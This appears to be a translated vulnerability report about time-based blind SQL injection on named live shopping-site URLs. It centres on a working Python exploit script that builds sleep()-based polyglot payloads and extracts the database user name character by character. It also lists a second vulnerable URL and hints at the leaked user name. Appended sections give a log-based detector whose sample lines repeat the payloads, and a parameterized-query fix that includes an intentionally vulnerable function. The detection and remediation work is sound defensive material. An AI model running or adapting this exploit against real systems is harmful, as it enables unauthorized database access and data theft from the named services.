MySQL blind injection (PoC) on an alimama website

Source: Internet
Author: User


MySQL blind injection

URL: http://brandbase.mama.cn/yikexin.php?ctype=*&mod=growth&op=detail&pgcount=12&tid=1520677

POST parameter: page=20

Problematic parameter: ctype

sqlmap could not exploit this injection point, so I adapted lijiejie's script instead of reinventing the wheel.

There are actually two injection points; the other one is on the main site. Because of my network environment I cannot reach that URL right now, but as I recall the current user there starts with "hr" and is 36 characters long.

URL: http://www.mama.cn:80/photo/index.php?a=Search&d=index&g=Search&gotosearch=yes&keyword=*&num=25&page=1&searchtype=photo

Problematic parameter: keyword

PoC:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# mysql_timebased.py
# Time-based blind injection PoC (Python 2: httplib/urllib, print statement).
# Truth oracle: when the injected condition holds, MySQL runs sleep(3); the
# client uses a 3 s socket timeout, so a timeout on all three attempts means
# the condition is true.
import httplib
import urllib

headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0'}
payloads = 'abcdefghijklmnopqrstuvwxyz1234567890.@_*%'


def build_payload(cond):
    # Polyglot wrapper: the leading if() fires in a numeric context, the part
    # inside the comment covers quoted contexts (%22 is an encoded ").
    return ("if(" + cond + ",sleep(3),0)"
            "/*'xor(if(1,sleep(3),0))or%22'xor(if(1,sleep(3),0))or%22*/")


def send(cond):
    # Returns True when the request timed out, i.e. the condition held.
    url = '/yikexin.php?ctype=%s&mod=growth&op=detail&pgcount=12&tid=1520677' % build_payload(cond)
    body = "page=20"
    try:
        conn = httplib.HTTPConnection('brandbase.mama.cn', timeout=3)
        conn.request(method='POST', headers=headers, url=url, body=urllib.quote(body))
        conn.getresponse()
        conn.close()
        print '*',
        return False
    except:
        return True


def GetUlength():
    # Get the length of the current user
    userlen = 0
    for i in range(1, 64):  # upper bound assumed; the original value was lost in extraction
        err_count = 0
        for j in range(3):
            if send("length(user())=%s" % i):
                err_count += 1
        if err_count == 3:
            userlen = i
            break
    return userlen


def GetUser(l):
    # Get the current user name, one character at a time
    user = ''
    for i in range(1, l + 1):  # the original range(1, l) dropped the last character
        for payload in payloads:
            err_count = 0
            for j in range(3):
                if send("ascii(mid(lower(user()),%s,1))=%s" % (i, ord(payload))):
                    err_count += 1
            if err_count == 3:
                user += payload
                print '\n[info]', user
                break
    return user


def main():
    userlen = GetUlength()
    print "user length:\n", userlen
    current_user = GetUser(userlen)
    print "\nCurrentUser is:", current_user


if __name__ == '__main__':
    print 'mysql-timebased-sqlinjection:\n'
    main()
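As an added example (not part of the original report or of the author's script), the following Python 3 script shows how a defender can spot this technique in web-server logs: it parses constructed sample log lines (hosts, timestamps and sizes are made up; the query strings follow the payload shape used above), flags query parameters that carry a MySQL delay primitive, and correlates each hit with the recorded response time. The log layout (combined format with the request time appended as a last field), the 2.5 s "slow" threshold and the function names are assumptions.

```python
#!/usr/bin/env python3
# time_based_sqli_detect.py (added example, not from the original report)
# Flags log entries whose query parameters carry a MySQL delay primitive and
# correlates them with response time, the two signatures of time-based blind
# injection: a delay function in the input and a response that is slow only
# when the injected condition is true.
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed sample lines: combined log format with the request time in
# seconds appended as a final field. Addresses, timestamps and sizes are
# made up; the first two requests mirror the report's payload shape, the
# third is a harmless search that merely contains the word "sleeping".
SAMPLE_LOG = """\
203.0.113.5 - - [01/May/2015:10:00:01 +0800] "POST /yikexin.php?ctype=if(length(user())=36,sleep(3),0)/*'xor(if(1,sleep(3),0))or%22'xor(if(1,sleep(3),0))or%22*/&mod=growth&op=detail&pgcount=12&tid=1520677 HTTP/1.1" 200 5120 3.012
203.0.113.5 - - [01/May/2015:10:00:05 +0800] "POST /yikexin.php?ctype=if(length(user())=37,sleep(3),0)/*'xor(if(1,sleep(3),0))or%22'xor(if(1,sleep(3),0))or%22*/&mod=growth&op=detail&pgcount=12&tid=1520677 HTTP/1.1" 200 5120 0.038
198.51.100.9 - - [01/May/2015:10:00:06 +0800] "GET /photo/index.php?a=Search&d=index&g=Search&gotosearch=yes&keyword=sleeping+baby&num=25&page=1&searchtype=photo HTTP/1.1" 200 8801 0.117
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) (?P<rt>\d+(?:\.\d+)?)$')

# MySQL delay primitives used by time-based probes. The "\(" keeps ordinary
# words such as "sleeping" from matching.
DELAY_RE = re.compile(r'\b(?:sleep|benchmark)\s*\(', re.IGNORECASE)

SLOW_SECONDS = 2.5  # assumed threshold; the PoC above uses sleep(3)


def parse_line(line):
    """Split one log line into its fields; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec['rt'] = float(rec['rt'])
    return rec


def suspicious_params(target):
    """Return (name, value) pairs from the query string that carry a delay primitive."""
    query = urlsplit(target).query
    hits = []
    # parse_qsl already percent-decodes once; the extra unquote_plus also
    # catches values that were double-encoded to evade naive filters.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if DELAY_RE.search(unquote_plus(value)):
            hits.append((name, value))
    return hits


def scan_log(text):
    """Return one finding per flagged parameter, with the observed latency."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        for name, value in suspicious_params(rec['target']):
            findings.append({
                'ip': rec['ip'],
                'ts': rec['ts'],
                'path': urlsplit(rec['target']).path,
                'param': name,
                'rt': rec['rt'],
                'slow': rec['rt'] >= SLOW_SECONDS,
            })
    return findings


def per_source(findings):
    """Flagged requests per client address. Character-by-character extraction
    needs dozens of requests per character, so one source with many hits is
    the pattern to alert on, even if most individual responses were fast."""
    counts = {}
    for f in findings:
        counts[f['ip']] = counts.get(f['ip'], 0) + 1
    return counts


if __name__ == '__main__':
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print('%(ts)s %(ip)s %(path)s param=%(param)s rt=%(rt).3fs slow=%(slow)s' % f)
    print('flagged requests per source:', per_source(found))
```

Only the first probe is slow (its condition was true), which is why the per-source count, not latency alone, is the useful alerting signal.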


Solution:

Filter the input and use structured (parameterized) SQL queries.
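To make that solution concrete, here is an added example (not code from the original report; the table, column names and the use of sqlite3 as a stand-in for MySQL are assumptions, since the site's real schema and driver are unknown). It places the string-built query that lets a request parameter such as ctype reach the SQL parser next to the parameterized form, and adds an allow-list check for a parameter that should only ever be a small integer.

```python
#!/usr/bin/env python3
# sqli_fix_example.py (added example, not from the original report)
# Vulnerable string-built lookup beside its parameterized replacement, using
# the standard-library sqlite3 driver as a stand-in for MySQL (assumption).
import sqlite3


def make_db():
    """In-memory table with invented rows; ctype plays the role of the page's ctype parameter."""
    conn = sqlite3.connect(':memory:')
    conn.execute("CREATE TABLE article (id INTEGER, ctype INTEGER, title TEXT, secret TEXT)")
    conn.executemany("INSERT INTO article VALUES (?, ?, ?, ?)", [
        (1, 1, 'growth tips', 'private-1'),
        (2, 2, 'other', 'private-2'),
        (3, 1, 'more growth', 'private-3'),
    ])
    conn.commit()
    return conn


def lookup_vulnerable(conn, ctype):
    # BAD: the request parameter is pasted into the SQL text, so whatever it
    # contains (an OR clause, or the sleep()-based condition from the PoC)
    # is parsed and executed as SQL.
    sql = "SELECT id, title FROM article WHERE ctype = %s" % ctype
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, ctype):
    # GOOD: the driver sends the value separately from the statement; it can
    # only ever be compared with the column, never parsed as SQL.
    return conn.execute("SELECT id, title FROM article WHERE ctype = ?", (ctype,)).fetchall()


def validate_ctype(raw):
    # Allow-list filter: ctype is a small non-negative integer in this
    # application, so reject anything else before it gets near the database.
    if not raw.isdigit() or len(raw) > 3:
        raise ValueError("invalid ctype")
    return int(raw)


def handle_request(conn, raw_ctype):
    """What the fixed endpoint does: validate, then query with a bound parameter."""
    return lookup_parameterized(conn, validate_ctype(raw_ctype))


if __name__ == '__main__':
    db = make_db()
    print('vulnerable, legit input   :', lookup_vulnerable(db, '1'))
    print('vulnerable, injected input:', lookup_vulnerable(db, '1 OR 1=1'))
    print('parameterized, injected   :', lookup_parameterized(db, '1 OR 1=1'))
    print('fixed endpoint, legit     :', handle_request(db, '1'))
    try:
        handle_request(db, '1 OR 1=1')
    except ValueError as e:
        print('fixed endpoint, injected  : rejected (%s)' % e)
```

With the bound parameter the injected text is compared as a value and matches nothing; the allow-list check in front of it rejects the input outright, so malformed requests never reach the query at all.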
